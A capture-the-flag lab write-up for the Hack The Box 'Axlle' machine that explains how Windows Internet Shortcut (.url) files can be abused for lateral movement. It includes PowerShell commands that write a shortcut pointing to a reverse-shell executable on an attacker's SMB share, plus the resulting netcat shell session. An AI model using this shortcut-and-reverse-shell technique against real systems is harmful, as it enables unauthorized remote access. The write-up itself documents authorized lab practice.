InfoSec LAB

Axlle_Lateral_Movement_dallon.matrix

Created: 2 min read

Windows Internet Shortcut

Windows Internet Shortcut files, typically with the .url extension, are used to store the URL of a web page. These files are plain text and contain the internet address along with metadata such as the icon location and working directory. When double-clicked, they open the specified URL in the user’s default web browser. They are commonly used for quickly accessing websites or organizing web links on a desktop or within a file system.

Windows Internet Shortcut files can be exploited by embedding malicious URLs, leading to phishing attacks or drive-by downloads when opened, potentially compromising the system. Attackers can also manipulate these files to execute arbitrary commands or scripts by exploiting the way Windows handles certain parameters within the shortcut.

Most important thing here is that there is no limit to protocol used, and it makes it a well-known trick among adversaries

PS C:\inetpub\testing> $url = "file:////10.10.14.110/smb/r.exe"
PS C:\inetpub\testing> $shortcutPath = "C:\inetpub\testing\shortcut.url"
PS C:\inetpub\testing> $shortcutContent = "[InternetShortcut]`r`nURL=$url"
PS C:\inetpub\testing> Set-Content -Path $shortcutPath -Value $shortcutContent

Using the PowerShell cmdlet, Set-Content, to generate a Windows Internet Shortcut file; shortcut.url It contains the reverse shell executable payload

PS C:\inetpub\testing> cat shortcut.url
[InternetShortcut]
URL=file:////10.10.14.110/smb/r.exe

There it is

A moment later, I get a callback on my Netcat listener on Kali

┌──(kali㉿kali)-[~/archive/htb/labs/axlle]
└─$ nnc 8888     
listening on [any] 8888 ...
connect to [10.10.14.110] from (UNKNOWN) [10.10.11.21] 57393
Microsoft Windows [Version 10.0.20348.2527]
(c) Microsoft Corporation. All rights reserved.
 
C:\>whoami
whoami
axlle\dallon.matrix
 
C:\>hostname
hostname
MAINFRAME
 
C:\>ipconfig
ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::22b
   IPv6 Address. . . . . . . . . . . : dead:beef::5697:caf:1789:6119
   Link-local IPv6 Address . . . . . : fe80::3dc:8d8c:bde5:350%11
   IPv4 Address. . . . . . . . . . . : 10.10.11.21
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1bd3%11
                                       10.10.10.2

Lateral Movement made to the dallon.matrix user via a Windows Internet Shortcut file

Interactive Graph View

Backlinks